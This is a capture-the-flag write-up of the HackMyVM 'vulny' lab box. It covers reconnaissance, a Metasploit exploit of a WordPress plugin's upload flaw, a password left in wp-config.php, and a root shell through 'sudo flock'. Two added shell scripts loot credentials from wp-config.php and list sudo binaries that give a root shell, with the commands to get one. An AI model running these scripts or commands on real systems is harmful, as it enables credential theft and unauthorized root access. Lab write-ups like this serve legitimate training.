HackMyVM target series (4) - vulny
2022-07-06 13:57:00 [The moon should know my meaning]
1. Information gathering
As usual, start with a sweep of the network segment to find the target host (-sP is the old spelling of -sn, host discovery only; the grep picks out the VirtualBox MAC vendor):
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Then scan all ports on the host with nmap. Two open ports were found: 80 (HTTP) and 33060 (the MySQL X Protocol port, which nmap reports as mysqlx; it did not matter for this box, so set it aside for now).
nmap -sC -sV 192.168.200.153 -p-
Visiting the home page turned up nothing useful.
As usual, move on to directory brute-forcing to see whether anything useful is exposed.
Scan the directories with gobuster:
gobuster dir -u http://192.168.200.153 -w directory-list-2.3-medium.txt -t 30 -x php,html,txt,7z,zip,bak,gz
Several directories and files came back; after visiting them, only the secret directory was of any use.
It contains the keyword wordpress. Is the site's CMS WordPress?
Run dirsearch against that directory to check:
dirsearch -u "http://192.168.200.153/secret/" -e php,html,txt,zip,bak,gz,7z -x 404,500-599 -t 50
Sure enough, it is WordPress, with the usual set of directories.
Visit them one by one to see what turns up.
One of them held a compressed archive. Downloaded and opened, it did not mean much at first glance.
A quick search showed that it is a WordPress plugin, and that the plugin has an arbitrary file upload vulnerability.
A search on exploit-db turned up an exploit script, but it kept failing with syntax errors; rather than fix the script, another route was taken.
2. Exploitation
Use msf (Metasploit), which has a module for this vulnerability.
Configure the module parameters and run it; it succeeds and returns a shell as the web server user. Upgrade it to an interactive TTY with Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Check the users on the box: besides root there is one more, adrian.
cat /etc/passwd
Note the sentence here that mentions the configuration file and that an account and password can be read from it.
So try reading the WordPress configuration file (wp-config.php).
[Image missing: the configuration file, in which a comment line is visible]
A comment line appears here. Is this the password of the user found above?
adrian:idrinksomewater
Perfect, the switch to adrian succeeds.
Get the first flag.
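The configuration-file step above, as an added example that is not part of the original write-up: a small POSIX shell script that pulls the DB_* defines and any user:password-looking comment lines out of a wp-config.php, skipping anything containing "://" so the stock @link comments do not produce false hits. The sample file it writes is constructed to mirror the page's finding (the adrian line); the database values in it are placeholders.

```shell
#!/bin/sh
# Added example: loot a WordPress wp-config.php for DB credentials and for
# stray "user:password" notes left in comments. The sample file is constructed.

# Write a constructed wp-config.php to the path in $1.
make_sample_config() {
  cat > "$1" <<'EOF'
<?php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wpuser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'wp-db-secret' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/* @link https://wordpress.org/support/article/editing-wp-config-php/ */
// adrian:idrinksomewater
$table_prefix = 'wp_';
EOF
}

# Print the database defines as KEY=VALUE, one per line.
wp_db_defines() {
  grep -E "define\( *'DB_(NAME|USER|PASSWORD|HOST)'" "$1" \
    | sed -E "s/.*define\( *'([A-Z_]+)' *, *'([^']*)'.*/\1=\2/"
}

# Print user:password-looking tokens that sit in comment lines (#, //, /* or *),
# dropping lines with "://" so URLs in the stock comments do not match.
wp_comment_creds() {
  grep -E '^[[:space:]]*(#|//|/?\*)' "$1" \
    | grep -v '://' \
    | grep -oE '[A-Za-z0-9_.-]+:[^[:space:]]+' || true
}

# Demo run against the constructed file.
demo() {
  tmp=$(mktemp)
  make_sample_config "$tmp"
  echo "# database defines"
  wp_db_defines "$tmp"
  echo "# credentials found in comments"
  wp_comment_creds "$tmp"
  rm -f "$tmp"
}

demo
```

Point it at the real file with `wp_db_defines /var/www/html/secret/wp-config.php` once you have the web shell; the DB password is worth trying against the local users as well, since reuse between the database and a system account is common on boxes like this.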
3. Privilege escalation
Check the sudo rules (sudo -l) for anything usable.
flock can be run through sudo as any user without a password.
Enter the following command to escalate:
sudo flock -u / /bin/bash
flock takes a lock on the given file (here /) and then runs the command that follows it; under sudo that command is a root shell, and -u only releases the lock rather than holding it.
Perfect, the shell now runs as root.
Get the second flag.
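The privilege-escalation check above, as an added example that is not part of the original write-up: a POSIX shell function that parses sudo -l output for NOPASSWD entries, splits comma-separated command lists, strips arguments, and reports the binaries known to run a command of the caller's choosing, plus the root-shell invocation for a few of them (GTFOBins-style techniques; the list is deliberately short). The sudo -l text is constructed in the shape the page describes; the hostname and the harmless cat entry are assumed.

```shell
#!/bin/sh
# Added example: find sudo NOPASSWD entries that hand out a root shell.
# The sudo -l output below is constructed; hostname and the cat entry are assumed.

SAMPLE_SUDO_L='Matching Defaults entries for adrian on vulny:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User adrian may run the following commands on vulny:
    (root) NOPASSWD: /bin/cat /var/log/auth.log
    (ALL) NOPASSWD: /usr/bin/flock'

# Binaries that can run an arbitrary command for the caller; abbreviated list.
SHELL_ESCAPES='flock vim vi find env awk perl python python3 bash sh'

# Print the basename of every NOPASSWD command whose binary is in SHELL_ESCAPES.
# Handles several commands on one line ("cmd1, cmd2") and strips arguments.
nopasswd_escapes() {
  printf '%s\n' "$1" \
    | grep -E '^[[:space:]]*\(.*\)[[:space:]]*NOPASSWD:' \
    | sed -E 's/.*NOPASSWD:[[:space:]]*//' \
    | tr ',' '\n' \
    | while read -r cmd; do
        [ -n "$cmd" ] || continue
        bin=$(basename "${cmd%% *}")
        for s in $SHELL_ESCAPES; do
          if [ "$s" = "$bin" ]; then printf '%s\n' "$bin"; fi
        done
      done
}

# Root-shell invocation for some of the binaries above (argument: basename).
escape_cmd() {
  case "$1" in
    flock)   echo "sudo flock -u / /bin/bash" ;;   # lock /, release it (-u), run bash as root
    vim|vi)  echo "sudo $1 -c ':!/bin/bash'" ;;
    find)    echo "sudo find . -exec /bin/bash \\; -quit" ;;
    env)     echo "sudo env /bin/bash" ;;
    awk)     echo "sudo awk 'BEGIN {system(\"/bin/bash\")}'" ;;
    perl)    echo "sudo perl -e 'exec \"/bin/bash\";'" ;;
    python|python3) echo "sudo $1 -c 'import os; os.system(\"/bin/bash\")'" ;;
    bash|sh) echo "sudo $1" ;;
    *)       return 1 ;;
  esac
}

# Demo: report every escape found in the constructed output with its command.
for b in $(nopasswd_escapes "$SAMPLE_SUDO_L"); do
  echo "$b -> $(escape_cmd "$b")"
done
```

On a live box, feed it the real output with `nopasswd_escapes "$(sudo -l 2>/dev/null)"`. Entries that pin a specific argument (like the cat line above) are skipped on purpose: they are still worth a look, but they do not give a shell by themselves.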